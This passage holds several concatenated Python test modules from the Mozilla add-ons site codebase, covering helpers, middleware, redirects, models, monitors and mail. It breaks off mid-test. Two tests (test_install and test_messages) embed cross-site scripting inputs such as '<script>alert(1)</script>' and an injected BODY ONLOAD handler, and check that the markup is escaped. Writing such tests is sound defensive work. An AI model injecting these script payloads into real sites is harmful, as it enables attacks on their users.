        # This source file itself is definitely not an image.
        img = ImageCheck(open(__file__, 'rb'))
        assert not img.is_image()
        img = ImageCheck(open(get_image_path('non-animated.gif')))
        assert img.is_image()
def test_site_nav():
    """site_nav() renders the #site-nav container for an app request."""
    r = Mock()
    r.APP = amo.FIREFOX
    assert 'id="site-nav"' in helpers.site_nav({'request': r})
def test_jinja_trans_monkeypatch():
    # This tests the monkeypatch in manage.py that prevents localizers from
    # taking us down.  Each malformed %-placeholder must render, not raise.
    render('{% trans come_on=1 %}% (come_on)s{% endtrans %}')
    render('{% trans come_on=1 %}%(come_on){% endtrans %}')
    render('{% trans come_on=1 %}%(come_on)z{% endtrans %}')
def test_absolutify():
    """absolutify() joins relative paths onto SITE_URL; absolute URLs pass
    through unchanged."""
    eq_(helpers.absolutify('/woo'), urljoin(settings.SITE_URL, '/woo'))
    eq_(helpers.absolutify('https://addons.mozilla.org'),
        'https://addons.mozilla.org')
def test_timesince():
    """timesince renders a human delta; None renders as ''."""
    month_ago = datetime.now() - timedelta(days=30)
    eq_(helpers.timesince(month_ago), u'1 month ago')
    eq_(helpers.timesince(None), u'')
def test_f():
    # This makes sure there's no UnicodeEncodeError when doing the string
    # interpolation.
    eq_(render(u'{{ "foo {0}"|f("baré") }}'), u'foo baré')
########NEW FILE########
__FILENAME__ = test_install
from amo.install import addons
from amo.tests import TestCase
from amo.urlresolvers import reverse
from amo.utils import urlparams
class InstallTests(TestCase):
    """api.install endpoint: lookup by id/name/key, redirects, 404s, XSS."""

    def test_generic(self):
        url = reverse('api.install')
        r = self.client.get(urlparams(url,
                                      addon_id='1',
                                      addon_name='Status Watch'))
        assert 'prompted to install Status Watch' in r.content

    def test_byid(self):
        url = reverse('api.install')
        r = self.client.get(urlparams(url, addon_id='318202'))
        assert 'prompted to install Twitter Address Search Bar' in r.content

    def test_byname(self):
        url = reverse('api.install')
        r = self.client.get(urlparams(url, addon_key='prism'))
        assert 'prompted to install Prism for Firefox' in r.content

    def test_byidname(self):
        # A non-numeric addon_id resolves like an addon_key.
        url = reverse('api.install')
        r = self.client.get(urlparams(url, addon_id='prism'))
        assert 'prompted to install Prism for Firefox' in r.content

    def test_redirect(self):
        url = reverse('api.install')
        r = self.client.get(urlparams(url, addon_id=424))
        self.assertEqual(r.status_code, 301)
        self.assertEqual(r['Location'], addons[424]['link'])

    def test_bad_id(self):
        url = reverse('api.install')
        r = self.client.get(urlparams(url, addon_id='eleventy-one'))
        self.assertEqual(r.status_code, 404)

    def test_bad_key(self):
        url = reverse('api.install')
        r = self.client.get(urlparams(url, addon_key='unicorns'))
        self.assertEqual(r.status_code, 404)

    def test_xss(self):
        # Injected markup in the query string must not reach the page raw.
        url = reverse('api.install')
        r = self.client.get(url + '?' + 'addon_id=252539%3C/script%3E%3CBODY%20ONLOAD=alert%28%27XSS%27%29%3E&addon_name=F1%20by%20Mozilla%20Labs&src=external-f1home')
        assert '<BODY' not in r.content
########NEW FILE########
__FILENAME__ = test_locales
from django.utils.translation import trans_real
import tower
def test_amo_locale_not_in_django():
    """
    We load gettext catalogs in this order:
        django/locale/django.po
        amo/locale/messages.po
    If Django doesn't have a locale, it returns the en-us catalog as a
    fallback.  But then we take that catalog and merge in our z-messages.po.
    That's no good because we just mixed some other locale into en-us.
    This test will be invalid once Django gets an mn locale.
    """
    tower.activate('mn')
    en = trans_real._translations['en-US']
    mn = trans_real._translations['mn']
    # The mn catalog must be a distinct object with distinct contents.
    assert en != mn
    assert en._catalog != mn._catalog
########NEW FILE########
__FILENAME__ = test_log
"""Tests for the activitylog."""
from datetime import datetime
from nose.tools import eq_
import amo
import amo.tests
from addons.models import Addon
from users.models import UserProfile
class LogTest(amo.tests.TestCase):
    """Tests for amo.log() activity-log entries."""

    def setUp(self):
        # amo.log() attributes entries to the current thread-local user,
        # so one has to be set before logging anything.
        u = UserProfile.objects.create(username='foo')
        amo.set_user(u)

    def test_details(self):
        """
        If we get details, verify they are stored as JSON, and we get out what
        we put in.
        """
        a = Addon.objects.create(name='kumar is awesome',
                                 type=amo.ADDON_EXTENSION)
        magic = dict(title='no', body='way!')
        al = amo.log(amo.LOG.DELETE_REVIEW, 1, a, details=magic)
        eq_(al.details, magic)
        # The private attribute holds the serialized (sorted-key JSON) form.
        eq_(al._details, '{"body": "way!", "title": "no"}')

    def test_created(self):
        """
        Verify that we preserve the create date.
        """
        al = amo.log(amo.LOG.CUSTOM_TEXT, 'hi', created=datetime(2009, 1, 1))
        eq_(al.created, datetime(2009, 1, 1))
########NEW FILE########
__FILENAME__ = test_messages
# -*- coding: utf-8 -*-
import django.contrib.messages as django_messages
from django.contrib.messages.storage import default_storage
from django.http import HttpRequest
from nose.tools import eq_
from tower import ugettext as _
from amo.messages import _make_message, info
def test_xss():
    """_make_message() must HTML-escape title/message unless the matching
    *_safe flag is set.

    As previously written, every assertion expected the *raw* markup, so the
    default (unsafe) cases would only pass if _make_message did NOT escape —
    i.e. the test asserted the vulnerable behavior.  The escaped expectations
    (``&lt;script&gt;``) were evidently lost to HTML-entity mangling; they
    are restored here for every case where the corresponding safe flag is
    not set.
    """
    title = "<script>alert(1)</script>"
    message = "<script>alert(2)</script>"
    # By default both pieces are escaped.
    r = _make_message(title)
    assert "&lt;script&gt;alert(1)&lt;/script&gt;" in r
    r = _make_message(None, message)
    assert "&lt;script&gt;alert(2)&lt;/script&gt;" in r
    # The matching safe flag lets trusted markup through unescaped.
    r = _make_message(title, title_safe=True)
    assert "<script>alert(1)</script>" in r
    r = _make_message(None, message, message_safe=True)
    assert "<script>alert(2)</script>" in r
    # Make sure safe flags are independent: message_safe must not unescape
    # the title, and title_safe must not unescape the message.
    r = _make_message(title, message_safe=True)
    assert "&lt;script&gt;alert(1)&lt;/script&gt;" in r
    r = _make_message(None, message, title_safe=True)
    assert "&lt;script&gt;alert(2)&lt;/script&gt;" in r
def test_no_dupes():
    """Test that duplicate messages aren't saved."""
    request = HttpRequest()
    request._messages = default_storage(request)
    # The first two messages are identical, so only one should be kept.
    for title, body in (('Title', 'Body'),
                        ('Title', 'Body'),
                        ('Another Title', 'Another Body')):
        info(request, title, body)
    eq_(len(django_messages.get_messages(request)), 2,
        'Too few or too many messages recorded.')
def test_l10n_dups():
    """Test that L10n values are preserved."""
    request = HttpRequest()
    request._messages = default_storage(request)
    # Lazy-translated duplicates must still be deduplicated.
    for title, body in ((_('Title'), _('Body')),
                        (_('Title'), _('Body')),
                        (_('Another Title'), _('Another Body'))):
        info(request, title, body)
    eq_(len(django_messages.get_messages(request)), 2,
        'Too few or too many messages recorded.')
def test_unicode_dups():
    """Test that unicode values are preserved."""
    request = HttpRequest()
    request._messages = default_storage(request)
    # Non-ASCII duplicates must still be deduplicated.
    for title, body in ((u'Titlé', u'Body'),
                        (u'Titlé', u'Body'),
                        (u'Another Titlé', u'Another Body')):
        info(request, title, body)
    eq_(len(django_messages.get_messages(request)), 2,
        'Too few or too many messages recorded.')
########NEW FILE########
__FILENAME__ = test_middleware
# -*- coding: utf-8 -*-
from django import http, test
from django.conf import settings
from commonware.middleware import ScrubRequestOnException
from mock import Mock, patch
from nose.tools import eq_
from pyquery import PyQuery as pq
from test_utils import RequestFactory
import amo.tests
from amo.middleware import NoAddonsMiddleware, NoVarySessionMiddleware
from amo.urlresolvers import reverse
from zadmin.models import Config, _config_cache
class TestMiddleware(amo.tests.TestCase):
    """Vary-header and session-avoidance middleware behaviour."""

    def test_no_vary_cookie(self):
        # We don't break good usage of Vary.
        response = test.Client().get('/')
        eq_(response['Vary'], 'Accept-Language, User-Agent, X-Mobile')
        # But we do prevent Vary: Cookie.
        response = test.Client().get('/', follow=True)
        eq_(response['Vary'], 'X-Mobile, User-Agent')

    @patch('django.contrib.sessions.middleware.'
           'SessionMiddleware.process_request')
    def test_session_not_used_api(self, process_request):
        # API requests must skip session handling entirely.
        req = RequestFactory().get('/')
        req.API = True
        NoVarySessionMiddleware().process_request(req)
        assert not process_request.called

    @patch('django.contrib.sessions.middleware.'
           'SessionMiddleware.process_request')
    def test_session_not_used(self, process_request):
        # Non-API requests still get normal session handling.
        req = RequestFactory().get('/')
        NoVarySessionMiddleware().process_request(req)
        assert process_request.called
def test_redirect_with_unicode_get():
    """The locale/app redirect must cope with percent-encoded UTF-8 data."""
    path = ('/da/firefox/addon/5457?from=/da/firefox/'
            'addon/5457%3Fadvancedsearch%3D1&lang=ja&utm_source=Google+%E3'
            '%83%90%E3%82%BA&utm_medium=twitter&utm_term=Google+%E3%83%90%'
            'E3%82%BA')
    resp = test.Client().get(path, follow=True)
    eq_(resp.status_code, 301)
def test_trailing_slash_middleware():
    """Trailing slashes are stripped and the query string re-encoded."""
    resp = test.Client().get(u'/en-US/about/?xxx=\xc3')
    eq_(resp.status_code, 301)
    assert resp['Location'].endswith('/en-US/about?xxx=%C3%83')
class AdminMessageTest(amo.tests.TestCase):
    """The zadmin 'site_notice' config value renders as a site banner."""

    def test_message(self):
        c = Config()
        c.key = 'site_notice'
        c.value = 'ET Sighted.'
        c.save()
        # Bust the zadmin config cache so the fresh value is read.
        if ('site_notice',) in _config_cache:
            del _config_cache[('site_notice',)]
        r = self.client.get(reverse('home'), follow=True)
        doc = pq(r.content)
        eq_(doc('#site-notice').text(), 'ET Sighted.')
        c.delete()
        del _config_cache[('site_notice',)]
        # With the config row gone the banner disappears.
        r = self.client.get(reverse('home'), follow=True)
        doc = pq(r.content)
        eq_(len(doc('#site-notice')), 0)
def test_hide_password_middleware():
    """Password fields get scrubbed from POST data on an exception."""
    req = RequestFactory().post('/', dict(x=1, password=2, password2=2))
    # The scrubber has to cope with an immutable QueryDict.
    req.POST._mutable = False
    ScrubRequestOnException().process_exception(req, Exception())
    for key, expected in (('x', '1'),
                          ('password', '******'),
                          ('password2', '******')):
        eq_(req.POST[key], expected)
class TestNoAddonsMiddleware(amo.tests.TestCase):
    """NoAddonsMiddleware 404s views living in NO_ADDONS_MODULES."""

    @patch('amo.middleware.ViewMiddleware.get_name')
    def process(self, name, get_name):
        # Helper: run process_view as if the resolved view were `name`.
        # (`get_name` is injected by the @patch decorator.)
        get_name.return_value = name
        request = RequestFactory().get('/')
        view = Mock()
        return NoAddonsMiddleware().process_view(request, view, [], {})

    @patch.object(settings, 'NO_ADDONS_MODULES',
                  ('some.addons',))
    def test_middleware(self):
        # The blocked module and its submodules 404; everything else passes.
        self.assertRaises(http.Http404, self.process, 'some.addons')
        self.assertRaises(http.Http404, self.process, 'some.addons.thingy')
        assert not self.process('something.else')
########NEW FILE########
__FILENAME__ = test_models
from mock import Mock
from nose.tools import eq_
import amo.models
from amo.models import manual_order
from amo.tests import TestCase
from amo import models as context
from addons.models import Addon
class ManualOrderTest(TestCase):
    """manual_order() returns rows in the caller-specified pk order."""
    fixtures = ('base/apps', 'base/addon_3615', 'base/addon_5299_gcal',
                'base/addon_40')

    def test_ordering(self):
        """Given a specific set of primary keys, assure that we return addons
        in that order."""
        semi_arbitrary_order = [40, 5299, 3615]
        addons = manual_order(Addon.objects.all(), semi_arbitrary_order)
        eq_(semi_arbitrary_order, [addon.id for addon in addons])
def test_skip_cache():
    """skip_cache() sets a thread-local flag and nests re-entrantly."""
    # Flag is unset (default False) before entering the context.
    eq_(getattr(context._locals, 'skip_cache', False), False)
    with context.skip_cache():
        eq_(context._locals.skip_cache, True)
        with context.skip_cache():
            eq_(context._locals.skip_cache, True)
        # Leaving the inner context keeps the outer flag set.
        eq_(context._locals.skip_cache, True)
    eq_(context._locals.skip_cache, False)
def test_use_master():
    """use_master() pins multidb to the master and nests re-entrantly."""
    local = context.multidb.pinning._locals
    # Not pinned before entering the context.
    eq_(getattr(local, 'pinned', False), False)
    with context.use_master():
        eq_(local.pinned, True)
        with context.use_master():
            eq_(local.pinned, True)
        # Still pinned after the inner context exits.
        eq_(local.pinned, True)
    eq_(local.pinned, False)
class TestModelBase(TestCase):
    """ModelBase.on_change() callback registration and dispatch."""
    fixtures = ['base/addon_3615']

    def setUp(self):
        # Isolate the registered callbacks so tests don't leak into
        # each other; restored in tearDown.
        self.saved_cb = amo.models._on_change_callbacks.copy()
        amo.models._on_change_callbacks.clear()
        self.cb = Mock()
        self.cb.__name__ = 'testing_mock_callback'
        Addon.on_change(self.cb)

    def tearDown(self):
        amo.models._on_change_callbacks = self.saved_cb

    def test_multiple_ignored(self):
        # Registering the same callback twice only stores it once.
        cb = Mock()
        cb.__name__ = 'something'
        old = len(amo.models._on_change_callbacks[Addon])
        Addon.on_change(cb)
        eq_(len(amo.models._on_change_callbacks[Addon]), old + 1)
        Addon.on_change(cb)
        eq_(len(amo.models._on_change_callbacks[Addon]), old + 1)

    def test_change_called_on_new_instance_save(self):
        for create_addon in (Addon, Addon.objects.create):
            addon = create_addon(site_specific=False, type=amo.ADDON_EXTENSION)
            addon.site_specific = True
            addon.save()
            assert self.cb.called
            # The callback receives old/new attrs, the instance and sender.
            kw = self.cb.call_args[1]
            eq_(kw['old_attr']['site_specific'], False)
            eq_(kw['new_attr']['site_specific'], True)
            eq_(kw['instance'].id, addon.id)
            eq_(kw['sender'], Addon)

    def test_change_called_on_update(self):
        addon = Addon.objects.get(pk=3615)
        addon.update(site_specific=False)
        assert self.cb.called
        kw = self.cb.call_args[1]
        eq_(kw['old_attr']['site_specific'], True)
        eq_(kw['new_attr']['site_specific'], False)
        eq_(kw['instance'].id, addon.id)
        eq_(kw['sender'], Addon)

    def test_change_called_on_save(self):
        addon = Addon.objects.get(pk=3615)
        addon.site_specific = False
        addon.save()
        assert self.cb.called
        kw = self.cb.call_args[1]
        eq_(kw['old_attr']['site_specific'], True)
        eq_(kw['new_attr']['site_specific'], False)
        eq_(kw['instance'].id, addon.id)
        eq_(kw['sender'], Addon)

    def test_change_is_not_recursive(self):
        # A callback that itself saves/updates must not re-trigger callbacks
        # (which would recurse forever).  `fn` is a mutable flag holder.
        class fn:
            called = False

        def callback(old_attr=None, new_attr=None, instance=None,
                     sender=None, **kw):
            fn.called = True
            # Both save and update should be protected:
            instance.update(site_specific=False)
            instance.save()

        Addon.on_change(callback)
        addon = Addon.objects.get(pk=3615)
        addon.save()
        assert fn.called
        # No exception = pass

    def test_safer_get_or_create(self):
        data = {'guid': '123', 'type': amo.ADDON_EXTENSION}
        a, c = Addon.objects.safer_get_or_create(**data)
        assert c
        b, c = Addon.objects.safer_get_or_create(**data)
        assert not c
        eq_(a, b)
def test_cache_key():
    """Cache keys must be identical regardless of which DB alias is used."""
    # Test that we are not taking the db into account when building our
    # cache keys for django-cache-machine. See bug 928881.
    eq_(Addon._cache_key(1, 'default'), Addon._cache_key(1, 'slave'))
########NEW FILE########
__FILENAME__ = test_monitor
import time
from django.conf import settings
from mock import Mock, patch
from nose.tools import eq_
import requests
import amo.tests
from amo.monitors import receipt_signer as signer, package_signer
@patch.object(settings, 'SIGNED_APPS_SERVER_ACTIVE', True)
@patch.object(settings, 'SIGNING_SERVER', 'http://foo/')
@patch.object(settings, 'SIGNED_APPS_SERVER', 'http://baz/')
class TestMonitor(amo.tests.TestCase):
    """Receipt-signer and package-signer monitors.

    Each monitor returns a tuple whose first element is '' on success or a
    human-readable error string; the tests check its prefix.
    """
    # Some rudimentary tests for the rest of the monitor would be nice.

    def _make_receipt(self):
        # A cracked receipt that expires comfortably in the future (36h)
        # and names the cert URL the monitor will fetch.
        now = time.time()
        return [
            {'exp': now + (3600 * 36), 'iss': 'http://foo/cert.jwk'}, '']

    @patch('amo.monitors.receipt')
    def test_sign_fails(self, receipt):
        from lib.crypto.receipt import SigningError
        receipt.sign.side_effect = SigningError
        eq_(signer()[0][:16], 'Error on signing')

    @patch('amo.monitors.receipt')
    def test_crack_fails(self, receipt):
        receipt.crack.side_effect = ValueError
        eq_(signer()[0][:25], 'Error on cracking receipt')

    @patch('amo.monitors.receipt')
    def test_expire(self, receipt):
        # A cert expiring within the warning window (12h < threshold) trips
        # the monitor.
        now = time.time()
        receipt.crack.return_value = [{'exp': now + (3600 * 12)}, '']
        eq_(signer()[0][:21], 'Cert will expire soon')

    @patch('requests.get')
    @patch('amo.monitors.receipt')
    def test_good(self, receipt, cert_response):
        receipt.crack.return_value = self._make_receipt()
        cert_response.return_value.ok = True
        cert_response.return_value.json = lambda: {'jwk': []}
        eq_(signer()[0], '')

    @patch('requests.get')
    @patch('amo.monitors.receipt')
    def test_public_cert_connection_error(self, receipt, cert_response):
        receipt.crack.return_value = self._make_receipt()
        cert_response.side_effect = Exception
        eq_(signer()[0][:29], 'Error on checking public cert')

    @patch('requests.get')
    @patch('amo.monitors.receipt')
    def test_public_cert_not_found(self, receipt, cert_response):
        receipt.crack.return_value = self._make_receipt()
        cert_response.return_value.ok = False
        cert_response.return_value.reason = 'Not Found'
        eq_(signer()[0][:29], 'Error on checking public cert')

    @patch('requests.get')
    @patch('amo.monitors.receipt')
    def test_public_cert_no_json(self, receipt, cert_response):
        receipt.crack.return_value = self._make_receipt()
        cert_response.return_value.ok = True
        cert_response.return_value.json = lambda: None
        eq_(signer()[0][:29], 'Error on checking public cert')

    @patch('requests.get')
    @patch('amo.monitors.receipt')
    def test_public_cert_invalid_jwk(self, receipt, cert_response):
        receipt.crack.return_value = self._make_receipt()
        cert_response.return_value.ok = True
        cert_response.return_value.json = lambda: {'foo': 1}
        eq_(signer()[0][:29], 'Error on checking public cert')

    @patch('requests.post')
    def test_app_sign_good(self, sign_response):
        sign_response().status_code = 200
        sign_response().content = '{"zigbert.rsa": "Vm0wd2QyUXlVWGxW"}'
        eq_(package_signer()[0], '')

    @patch('amo.monitors.os.unlink', new=Mock)
    @patch('requests.post')
    def test_app_sign_fail(self, sign_response):
        sign_response().side_effect = requests.exceptions.HTTPError
        assert package_signer()[0].startswith('Error on package signing')
########NEW FILE########
__FILENAME__ = test_paginator
from mock import Mock
from nose.tools import eq_
from amo.helpers import Paginator
def mock_pager(page_number, num_pages, count):
    """Build a Mock that quacks like a Django Page for Paginator tests."""
    pager = Mock()
    pager.paginator = Mock()
    pager.number = page_number
    pager.paginator.num_pages = num_pages
    pager.paginator.count = count
    return pager
def assert_range(page_number, num_pages, expected):
    """Assert Paginator.range() for a pager on `page_number` of `num_pages`."""
    paginator = Paginator(mock_pager(page_number, num_pages, 100))
    eq_(paginator.range(), expected)
def test_page_range():
    """Spot-check the window of page links around the current page."""
    cases = (
        (1, 75, [1, 2, 3, 4, 5, 6, 7, 8]),
        (2, 75, [1, 2, 3, 4, 5, 6, 7, 8]),
        (3, 75, [1, 2, 3, 4, 5, 6, 7, 8]),
        (4, 75, [1, 2, 3, 4, 5, 6, 7, 8]),
        (5, 75, [2, 3, 4, 5, 6, 7, 8]),
        (6, 75, [3, 4, 5, 6, 7, 8, 9]),
        (8, 75, [5, 6, 7, 8, 9, 10, 11]),
        (37, 75, [34, 35, 36, 37, 38, 39, 40]),
        (70, 75, [67, 68, 69, 70, 71, 72, 73]),
        (71, 75, [68, 69, 70, 71, 72, 73, 74]),
        (72, 75, [68, 69, 70, 71, 72, 73, 74, 75]),
        (73, 75, [68, 69, 70, 71, 72, 73, 74, 75]),
        (74, 75, [68, 69, 70, 71, 72, 73, 74, 75]),
        (75, 75, [68, 69, 70, 71, 72, 73, 74, 75]),
        (1, 8, [1, 2, 3, 4, 5, 6, 7, 8]),
    )
    for page, pages, expected in cases:
        assert_range(page, pages, expected)
def test_dots():
    """Ellipsis flags appear only on sides where pages are truncated."""
    for page, pages, upper, lower in ((1, 5, False, False),
                                      (1, 25, True, False),
                                      (12, 25, True, True),
                                      (24, 25, False, True)):
        pager = Paginator(mock_pager(page, pages, 100)).pager
        eq_(bool(pager.dotted_upper), upper)
        eq_(bool(pager.dotted_lower), lower)
########NEW FILE########
__FILENAME__ = test_readonly
from django.conf import settings
from django.db import models
from django.utils import importlib
import MySQLdb as mysql
from nose.tools import assert_raises, eq_
from pyquery import PyQuery as pq
import amo.tests
from amo.urlresolvers import reverse
from addons.models import Addon
def pubdir(ob):
    """Yield the names of `ob`'s attributes that aren't underscore-private."""
    return (name for name in dir(ob) if not name.startswith('_'))
def quickcopy(val):
    """Shallow-copy dicts and lists; return any other value unchanged."""
    if isinstance(val, dict):
        return val.copy()
    if isinstance(val, list):
        return list(val)
    return val
class ReadOnlyModeTest(amo.tests.TestCase):
    """Flip the site into read-only mode and check DB writes are refused."""
    extra = ('amo.middleware.ReadOnlyMiddleware',)

    def setUp(self):
        # Any ORM write during these tests should blow up the way a
        # read-only MySQL slave would.
        models.signals.pre_save.connect(self.db_error)
        models.signals.pre_delete.connect(self.db_error)
        # Snapshot every public setting so tearDown can restore them.
        self.old_settings = dict((k, quickcopy(getattr(settings, k)))
                                 for k in pubdir(settings))
        settings.SLAVE_DATABASES = ['default']
        settings_module = importlib.import_module(settings.SETTINGS_MODULE)
        settings_module.read_only_mode(settings._wrapped.__dict__)
        self.client.handler.load_middleware()

    def tearDown(self):
        # Delete settings attributes added after the snapshot was taken.
        # BUGFIX: this used to call delattr() on the snapshot *dict*
        # (self.old_settings), which raises AttributeError instead of
        # cleaning up `settings`; the intent is to remove the new attrs
        # from the settings object itself.
        for k in pubdir(settings):
            if k not in self.old_settings:
                delattr(settings, k)
        for k, v in self.old_settings.items():
            try:
                setattr(settings, k, v)
            except AttributeError:
                # __weakref__
                pass
        models.signals.pre_save.disconnect(self.db_error)
        models.signals.pre_delete.disconnect(self.db_error)

    def db_error(self, *args, **kwargs):
        raise mysql.OperationalError("You can't do this in read-only mode.")

    def test_db_error(self):
        assert_raises(mysql.OperationalError, Addon.objects.create, id=12)

    def test_bail_on_post(self):
        # POSTs in read-only mode get the 503 maintenance page.
        r = self.client.post('/en-US/firefox/')
        eq_(r.status_code, 503)
        title = pq(r.content)('title').text()
        assert title.startswith('Maintenance in progress'), title
########NEW FILE########
__FILENAME__ = test_redirects
# -*- coding: utf-8 -*-
"""Check all our redirects from remora to zamboni."""
from nose.tools import eq_
import amo
import amo.tests
from addons.models import Category
from applications.models import Application
class TestRedirects(amo.tests.TestCase):
    """Legacy (remora) URLs must 301 to their zamboni equivalents."""
    fixtures = ['base/apps', 'reviews/test_models', 'base/global-stats']

    def test_top_tags(self):
        """`/top-tags/?` should 301 to `/tags/top`."""
        response = self.client.get(u'/top-tags/', follow=True)
        self.assert3xx(response, '/en-US/firefox/tags/top',
                       status_code=301)

    def test_contribute_installed(self):
        """`/addon/\d+/about` should go to
        `/addon/\d+/contribute/installed`."""
        r = self.client.get(u'/addon/5326/about', follow=True)
        redirect = r.redirect_chain[-1][0]
        assert redirect.endswith(
            '/en-US/firefox/addon/5326/contribute/installed/')

    def test_contribute(self):
        """`/addons/contribute/$id` should go to `/addon/$id/contribute`."""
        response = self.client.get(u'/addon/5326/contribute', follow=True)
        redirect = response.redirect_chain[-1][0]
        assert redirect.endswith('/en-US/firefox/addon/5326/contribute/')

    def test_utf8(self):
        """Without proper unicode handling this will fail."""
        response = self.client.get(u'/api/1.5/search/ツールバー',
                                   follow=True)
        # Sphinx will be off so let's just test that it redirects.
        eq_(response.redirect_chain[0][1], 301)

    def test_parameters(self):
        """Bug 554976. Make sure when we redirect, we preserve our query
        strings."""
        url = u'/users/login?to=/en-US/firefox/users/edit'
        r = self.client.get(url, follow=True)
        self.assert3xx(r, '/en-US/firefox' + url, status_code=301)

    def test_reviews(self):
        response = self.client.get('/reviews/display/4', follow=True)
        self.assert3xx(response, '/en-US/firefox/addon/a4/reviews/',
                       status_code=301)

    def test_browse(self):
        response = self.client.get('/browse/type:3', follow=True)
        self.assert3xx(response, '/en-US/firefox/language-tools/',
                       status_code=301)

    def test_accept_language(self):
        """
        Given an Accept Language header, do the right thing. See bug 439568
        for juicy details.
        """
        response = self.client.get('/', follow=True, HTTP_ACCEPT_LANGUAGE='de')
        self.assert3xx(response, '/de/firefox/', status_code=301)
        response = self.client.get('/', follow=True,
                                   HTTP_ACCEPT_LANGUAGE='en-us, de')
        self.assert3xx(response, '/en-US/firefox/', status_code=301)
        response = self.client.get('/', follow=True,
                                   HTTP_ACCEPT_LANGUAGE='fr, en')
        self.assert3xx(response, '/fr/firefox/', status_code=301)
        # Unknown regional variants fall back to the language's default.
        response = self.client.get('/', follow=True,
                                   HTTP_ACCEPT_LANGUAGE='pt-XX, xx, yy')
        self.assert3xx(response, '/pt-PT/firefox/', status_code=301)
        response = self.client.get('/', follow=True,
                                   HTTP_ACCEPT_LANGUAGE='pt')
        self.assert3xx(response, '/pt-PT/firefox/', status_code=301)
        response = self.client.get('/', follow=True,
                                   HTTP_ACCEPT_LANGUAGE='pt, de')
        self.assert3xx(response, '/pt-PT/firefox/', status_code=301)
        response = self.client.get('/', follow=True,
                                   HTTP_ACCEPT_LANGUAGE='pt-XX, xx, de')
        self.assert3xx(response, '/pt-PT/firefox/', status_code=301)
        # Entirely unknown languages fall back to en-US.
        response = self.client.get('/', follow=True,
                                   HTTP_ACCEPT_LANGUAGE='xx, yy, zz')
        self.assert3xx(response, '/en-US/firefox/', status_code=301)
        # Garbage headers must not crash the middleware.
        response = self.client.get('/', follow=True,
                                   HTTP_ACCEPT_LANGUAGE='some,thing-very;very,,,broken!\'jj')
        self.assert3xx(response, '/en-US/firefox/', status_code=301)
        # q-values are honoured.
        response = self.client.get('/', follow=True,
                                   HTTP_ACCEPT_LANGUAGE='en-us;q=0.5, de')
        self.assert3xx(response, '/de/firefox/', status_code=301)

    def test_users(self):
        response = self.client.get('/users/info/1', follow=True)
        self.assert3xx(response, '/en-US/firefox/user/1/',
                       status_code=301)

    def test_extension_sorting(self):
        r = self.client.get('/browse/type:1?sort=updated', follow=True)
        self.assert3xx(r, '/en-US/firefox/extensions/?sort=updated',
                       status_code=301)
        r = self.client.get('/browse/type:1?sort=name', follow=True)
        self.assert3xx(r, '/en-US/firefox/extensions/?sort=name',
                       status_code=301)
        r = self.client.get('/browse/type:1?sort=newest', follow=True)
        self.assert3xx(r, '/en-US/firefox/extensions/?sort=created',
                       status_code=301)
        r = self.client.get('/browse/type:1?sort=weeklydownloads', follow=True)
        self.assert3xx(r, '/en-US/firefox/extensions/?sort=popular',
                       status_code=301)
        r = self.client.get('/browse/type:1?sort=averagerating', follow=True)
        self.assert3xx(r, '/en-US/firefox/extensions/?sort=rating',
                       status_code=301)
        # If we don't recognize the sort, they get nothing.
        r = self.client.get('/browse/type:1?sort=xxx', follow=True)
        self.assert3xx(r, '/en-US/firefox/extensions/',
                       status_code=301)
        a = Application.objects.create()
        Category.objects.create(pk=12, slug='woo', type=amo.ADDON_EXTENSION,
                                application=a, count=1, weight=0)
        r = self.client.get('/browse/type:1/cat:12?sort=averagerating',
                            follow=True)
        url, code = r.redirect_chain[-1]
        eq_(code, 301)
        assert url.endswith('/en-US/firefox/extensions/woo/?sort=rating')

    def test_addons_reviews_rss(self):
        r = self.client.get('/addons/reviews/4/format:rss', follow=True)
        self.assert3xx(r, '/en-US/firefox/addon/4/reviews/format:rss',
                       status_code=301)

    def test_mobile_to_android(self):
        """
        'Mobile' is the legacy XUL-based Firefox for Android.
        'Android' is the new hotness.
        """
        res = self.client.get('/mobile', follow=True)
        self.assert3xx(res, '/en-US/android/', status_code=301)
        res = self.client.get('/mobile/', follow=True)
        self.assert3xx(res, '/en-US/android/', status_code=301)
        res = self.client.get('/mobile/extensions/', follow=True)
        self.assert3xx(res, '/en-US/mobile/extensions/', status_code=301)
########NEW FILE########
__FILENAME__ = test_send_mail
from django import test
from django.conf import settings
from django.core import mail
from django.core.mail import EmailMessage
from django.template import Context as TemplateContext
from django.utils import translation
import mock
from nose.tools import eq_
import users.notifications
from amo.models import FakeEmail
from amo.utils import send_html_mail_jinja, send_mail
from users.models import UserNotification, UserProfile
class TestSendMail(test.TestCase):
    """amo.utils.send_mail / send_html_mail_jinja behaviour."""
    fixtures = ['base/users']

    def setUp(self):
        # Snapshot the blacklist so tests can mutate it freely.
        self._email_blacklist = list(getattr(settings, 'EMAIL_BLACKLIST', []))

    def tearDown(self):
        translation.activate('en_US')
        settings.EMAIL_BLACKLIST = self._email_blacklist

    def test_send_string(self):
        # recipient_list must be a sequence, not a bare string.
        to = '[email protected]'
        with self.assertRaises(ValueError):
            send_mail('subj', 'body', recipient_list=to)

    def test_blacklist(self):
        # Blacklisted recipients are silently dropped but still "succeed".
        to = '[email protected]'
        settings.EMAIL_BLACKLIST = (to,)
        success = send_mail('test subject', 'test body',
                            recipient_list=[to], fail_silently=False)
        assert success
        eq_(len(mail.outbox), 0)

    def test_blacklist_flag(self):
        to = '[email protected]'
        settings.EMAIL_BLACKLIST = (to,)
        success = send_mail('test subject', 'test body',
                            recipient_list=[to], fail_silently=False,
                            use_blacklist=True)
        assert success
        eq_(len(mail.outbox), 0)
        # use_blacklist=False bypasses the blacklist entirely.
        success = send_mail('test subject', 'test body',
                            recipient_list=[to], fail_silently=False,
                            use_blacklist=False)
        assert success
        eq_(len(mail.outbox), 1)

    def test_user_setting_default(self):
        user = UserProfile.objects.all()[0]
        to = user.email
        # Confirm there's nothing in the DB and we're using the default
        eq_(UserNotification.objects.count(), 0)
        # Make sure that this is True by default
        setting = users.notifications.NOTIFICATIONS_BY_SHORT['reply']
        eq_(setting.default_checked, True)
        success = send_mail('test subject', 'test body', perm_setting='reply',
                            recipient_list=[to], fail_silently=False)
        assert success, "Email wasn't sent"
        eq_(len(mail.outbox), 1)
        eq_(mail.outbox[0].body.count('users/unsubscribe'), 1)  # bug 676601

    def test_user_setting_checked(self):
        user = UserProfile.objects.all()[0]
        to = user.email
        n = users.notifications.NOTIFICATIONS_BY_SHORT['reply']
        UserNotification.objects.get_or_create(notification_id=n.id,
                                               user=user, enabled=True)
        # Confirm we're reading from the database
        eq_(UserNotification.objects.filter(notification_id=n.id).count(), 1)
        success = send_mail('test subject', 'test body', perm_setting='reply',
